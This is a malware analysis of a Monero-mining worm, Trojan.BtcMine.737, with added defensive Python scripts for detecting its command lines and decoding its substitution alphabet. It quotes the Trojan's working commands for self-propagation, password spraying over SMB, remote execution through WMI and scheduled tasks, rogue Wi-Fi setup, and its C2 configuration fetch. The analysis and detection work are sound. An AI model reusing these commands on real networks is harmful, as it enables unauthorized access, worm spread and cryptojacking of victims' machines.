SHA1:
cc1e71c0e65280c9a32699e2850fafba19218fa0 (dropper)
edd53c0995a37618ffdb84557c8d737ae1ff5cc6 (worm)
f6ab05d457dab97767e5112ac4cc6e4998345afa (miner)
A Trojan that mines cryptocurrency on the infected computer (the configuration below points to a Monero pool). It consists of three installers nested in one another, all built with the Nullsoft Scriptable Install System (NSIS).
The first installer is a simple dropper. It starts by killing running processes that belong to the Trojan itself or to earlier copies of it:
cmd /c taskkill /f /im file0.exe & tskill file0.exe
cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe
cmd /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd /c taskkill /f /im cgminer.exe & tskill cgminer.exe
cmd /c taskkill /f /im key.exe & tskill key.exe
Then it writes a copy of itself to the hard drive of the compromised computer and runs that copy:
%TEMP%\Key.exe
After that, the dropper attempts to delete its original file:
cmd /c for %i in (1,1,900) do del "<full path to the dropper>"
The second installer (key.exe) saves an executable named CNminer.exe to the following folder and then runs it:
%APPDATA%\NsCpuCNMiner\
Then it copies itself to the common Startup folder and to %APPDATA%\%USERNAME% with the following command:
cmd /c xcopy /y <own name> %COMMON_STARTUP% & xcopy /y /i <own name> %APPDATA%\%USERNAME%
and shares the latter folder on the local network:
net share %USERNAME%="$APPDATA\%USERNAME%" /unlimited /cache:programs
After that, the second installer copies itself to the shared Documents folder, trying both the Russian-localized folder name (Документы) and the English one:
"cmd" /c xcopy /y "$EXEPATH" "C:\Documents and Settings\All Users\Документы\" &
xcopy /y /i "$EXEPATH" "C:\Documents and Settings\All users\Documents\"
Then the Trojan copies itself to the root of every drive letter (this operation is repeated periodically):
cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z)
do xcopy /y "%Temp%\key.exe" %i:\
These copies are named Key and are made to look like WinRAR archives.
Once launched, the Trojan enumerates the computers visible in Network Places:
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view
and tries to log on to each of them with user names and passwords from a built-in list:
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "passwordpassword" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "flvbybcnhfnjh" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
...
(The third password, flvbybcnhfnjh, is the Russian word администратор, "administrator", typed on an English keyboard layout.)
The malicious program also tries to crack the password of the Windows user account, which it needs to register a scheduled task under that account (the /RU and /RP parameters below). If the attempt succeeds and a wireless adapter is available, Trojan.BtcMine.737 brings up a Wi-Fi hosted network whose key is advertised in its SSID, in effect an open access point, and shares its folder once more:
cmd /c taskkill /f /im schtasks.exe &
tskill schtasks.exe &
SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow
ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork &
net share %USERNAME%=C:\Users\%USERNAME%\AppData\Roaming\%USERNAME% /unlimited
/cache:programs" /RU "%USERNAME%" /RP "passwordpassword" /SC ONCE /ST 01:00:00 &&
SchTasks /Run /TN WiFi /i
If a connection to a computer on the network is established, the Trojan copies itself there and runs the copy through Windows Management Instrumentation (WMI). It first checks whether its process is already running on the remote host and creates it only when it is not, trying two candidate paths:
StrCpy $R7 "/node:"$R1" /user:$R2 /password:$R3"
Push "cmd" /c wmic $R7 process where name="$EXEFILE" | find /i "$EXEFILE" ||
(wmic $R7 process call create "C:$R5\$EXEFILE" & wmic $R7 process call create "$R6\$EXEFILE")
or through Task Scheduler, registering a task named Key that runs the copy as SYSTEM at every logon:
Push "cmd" /c schtasks /create /s "$R1" /u $R2 /p $R3 /ru system /tn "Key"
/tr "C:$R5\$EXEFILE" /sc onlogon /f
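The commands quoted above (the taskkill/net use credential sweep, the wmic and schtasks remote execution, the hosted-network task, the net share of the profile folder and the xcopy to drive roots) are easy to pick out of process-creation telemetry. The following Python script is an added example and not part of Dr.Web's analysis or of the Trojan: it runs one regular expression per behaviour over a constructed set of command lines modelled on the ones above (host names, user names and passwords are placeholders, and the rule labels are our own), and it also groups net use attempts by target and account so that a host which received several different passwords is reported as a sweep, which is what separates the Trojan's wordlist from a legitimate single drive mapping.

```python
import re

# Constructed sample of process-creation command lines (what Sysmon event 1 or
# Windows event 4688 would record), modelled on the commands quoted in the
# analysis above. Host names, user names and passwords are placeholders.
SAMPLE_CMDLINES = [
    'cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe',
    '"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view',
    '"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use "\\\\NETCOMP-PC" '
    '"passwordpassword" /user:"NETCOMP" & net view "\\\\NETCOMP-PC" & net use "\\\\NETCOMP-PC" /delete /y',
    '"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use "\\\\NETCOMP-PC" '
    '"P@ssw0rd" /user:"NETCOMP" & net view "\\\\NETCOMP-PC" & net use "\\\\NETCOMP-PC" /delete /y',
    'cmd /c wmic /node:"NETCOMP-PC" /user:NETCOMP /password:P@ssw0rd process call create '
    '"C:\\Users\\NETCOMP\\AppData\\Roaming\\NETCOMP\\Key.exe"',
    'cmd /c schtasks /create /s "NETCOMP-PC" /u NETCOMP /p P@ssw0rd /ru system /tn "Key" '
    '/tr "C:\\Users\\NETCOMP\\AppData\\Roaming\\NETCOMP\\Key.exe" /sc onlogon /f',
    'SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow '
    'ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork" '
    '/RU "alice" /RP "passwordpassword" /SC ONCE /ST 01:00:00',
    'net share alice="C:\\Users\\alice\\AppData\\Roaming\\alice" /unlimited /cache:programs',
    'cmd /c xcopy /y "C:\\Users\\alice\\AppData\\Local\\Temp\\key.exe" D:\\',
    # Two benign lines that must not be flagged.
    'net use Z: \\\\fileserver\\share /persistent:yes',
    'schtasks /query /tn Backup',
]

# One regex per behaviour described in the analysis; the labels are our own.
RULES = [
    ("kill_known_miner",
     re.compile(r'taskkill\s+/f\s+/im\s+(?:CNminer|minerd|cgminer|NsCpuCNMiner(?:32|64)|key|file0)\.exe', re.I)),
    ("kill_net_then_enum",   # "taskkill /f /im net.exe & tskill net.exe & net view|use"
     re.compile(r'taskkill\s+/f\s+/im\s+net\.exe.*\bnet\s+(?:view|use)\b', re.I)),
    ("smb_logon_with_inline_password",
     re.compile(r'net\s+use\s+"?\\\\[^"\s]+"?\s+"?[^"\s]+"?\s+/user:', re.I)),
    ("remote_wmi_process_create",
     re.compile(r'wmic\s+/node:\S+\s+/user:\S+\s+/password:\S+\s+process\s+call\s+create', re.I)),
    ("remote_schtasks_onlogon",
     re.compile(r'schtasks\s+/create\s+/s\s+\S+.*?/sc\s+onlogon', re.I)),
    ("rogue_hosted_wifi",
     re.compile(r'netsh\s+wlan\s+set\s+hostednetwork\s+mode=allow', re.I)),
    ("share_of_roaming_profile_dir",
     re.compile(r'net\s+share\s+\S+=.*AppData\\Roaming', re.I)),
    ("copy_to_drive_root",
     re.compile(r'xcopy\s+/y\s+"?[^"]*key\.exe"?\s+[A-Z]:\\', re.I)),
]

# Captures (host, password, user) from a 'net use \\host password /user:name' call.
NET_USE_RE = re.compile(
    r'net\s+use\s+"?(\\\\[^"\s]+)"?\s+"?([^"\s]+)"?\s+/user:"?([^"\s]+)"?', re.I)


def tag_cmdline(cmdline):
    """Return the labels of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, labels) for every line that matched at least one rule."""
    hits = []
    for line in cmdlines:
        labels = tag_cmdline(line)
        if labels:
            hits.append((line, labels))
    return hits


def password_attempts(cmdlines):
    """Map (host, user) -> set of distinct passwords tried via 'net use'."""
    attempts = {}
    for line in cmdlines:
        for host, password, user in NET_USE_RE.findall(line):
            attempts.setdefault((host.upper(), user.upper()), set()).add(password)
    return attempts


def spraying_targets(cmdlines, min_distinct_passwords=2):
    """Hosts/accounts that received several different passwords, i.e. the
    Trojan's wordlist sweep rather than a single legitimate drive mapping."""
    return sorted(key for key, pws in password_attempts(cmdlines).items()
                  if len(pws) >= min_distinct_passwords)


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_CMDLINES):
        print(", ".join(labels), "<-", line[:70])
    print("password sweep against:", spraying_targets(SAMPLE_CMDLINES))
```

The per-line rules are deliberately narrow (the taskkill of net.exe immediately followed by net view/net use is peculiar to this family), while the sweep detector needs a stream of events: a single net use with an inline password is common in logon scripts, two or more different passwords against the same host and account are not.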
Once launched on the infected computer, CNminer.exe saves the miner's files (NsCpuCNMiner32.exe, NsCpuCNMiner64.exe and pools.txt) to the folder it was started from. To ensure autorun it adds a value to the HKCU Run key and additionally creates a shortcut in the common Startup folder:
WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "CNminer"
"$APPDATA\NsCpuCNMiner\CNminer.exe"
CreateShortCut "$COMMON_STARTUP\CNminer.lnk" "$APPDATA\NsCpuCNMiner\CNminer.exe"
0 465 108462336
When this third installer runs, its script first kills the following miner processes, if they are running:
cmd.exe /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner32.exe & tskill NsCpuCNMiner32.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner64.exe & tskill NsCpuCNMiner64.exe
Then the Trojan connects to the command and control server and downloads additional configuration data as an HTML page. The data contains pool settings and wallet identifiers, which are changed constantly. The decompiled script holds two character tables (the second is the first reversed, i.e. a simple substitution alphabet), a list of server names (masked here), a default pool and a default wallet. The request URL is built from the server name, test.html and the current GetTickCount value as a cache-busting query string, and the page is fetched with the NSIS inetc plugin under a Firefox 4 User-Agent:
StrCpy $[38] "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
StrCpy $[39] " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
StrCpy $[33]
"st******t.ru,178.**.***.223,pr******t.ru,te*****y.ru,p*****s.ru,qp****t.ru,pr*****s.ru"
StrCpy $[34] "stratum+tcp://mine.moneropool.com:8080 -t 0"
StrCpy $[35]
"43qgfne1Bi2UUvffo815n3DfGmMW6ZRmagc2aCagW9wdY7QDvL1qCw1LD6FCro9kk42e86bxxRbbnSk3mUfaW2nCDbZgABp"
...
Push kernel32::GetTickCount()i.r2
StrCpy $[32] "http://$[32]/test.html?$2"
...
Push $[32]
Push /TOSTACK
Push Mozilla/5.0 Gecko/20100101 Firefox/4.0
Push /USERAGENT
RegisterDLL $PLUGINSDIR\inetc.dll get 0
Sleep 942
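The two character tables at the top of that listing deserve a closer look: the second string is exactly the first one reversed, so together they define a fixed substitution alphabet (the same construction as Atbash) that is its own inverse, and any string encoded with it, separators included, decodes with the same single table lookup. The script below is an added example and not code from the Trojan or from Dr.Web: it rebuilds that table in Python and decodes a constructed sample. That the Trojan applies the table to its server list is an assumption made here for illustration; the listing shows the tables but not their use.

```python
# The two tables quoted verbatim from the decompiled NSIS script above.
PLAIN = "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
CIPHER = " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
assert CIPHER == PLAIN[::-1]   # reversed alphabet: the mapping is an involution

_TABLE = str.maketrans(PLAIN, CIPHER)


def substitute(text):
    """Apply the table. Because CIPHER is PLAIN reversed, encoding and decoding
    are the same operation; characters outside the table (upper case, '-', ...)
    pass through unchanged."""
    return text.translate(_TABLE)


def unmapped_chars(text):
    """Characters the table cannot represent; handy for deciding whether a blob
    could have been produced by this scheme at all."""
    return sorted(set(text) - set(PLAIN))


def decode_server_list(blob):
    """Decode a blob and split it on ',' the way the masked server list above is
    delimited. The separator itself is encoded (',' <-> 'm'), so the ciphertext
    cannot be split before decoding. (Assumed use of the table, see lead-in.)"""
    return substitute(blob).split(",")


# Constructed ciphertext: substitute("pool.example:8080,test.html").
SAMPLE_BLOB = "899@nr%7,8@rbpipimwr6wn2w,@"

if __name__ == "__main__":
    print(decode_server_list(SAMPLE_BLOB))
    print(substitute("test.html"), "->", substitute(substitute("test.html")))
```

Because the alphabet contains the URL characters '/', ':', '?', '&', '=' and '%' as well as digits and lower-case letters, a complete pool URL such as the stratum+tcp address in the listing can be carried in encoded form; anything outside that set, reported by unmapped_chars, would have to be stored in the clear.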
After that, the miner itself is launched with the pool, wallet and thread settings from the configuration:
"C:\Users\<username>\AppData\Roaming\NsCpuCNMiner\NsCpuCNMiner32.exe" -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u 43tjagd2e8d4GXzYn5xmysYmDnLbvvZSHFPbMWtg4Cs1DLwztfENYbNBz8Y8fmuhpCXFHDzXUWn2QZwhswsNtgzTM8v899K -p x
Note that the miner itself is not the cybercriminals' own code: it is a third-party mining tool written by another developer, which Dr.Web detects as a program of the Tool.BtcMine family.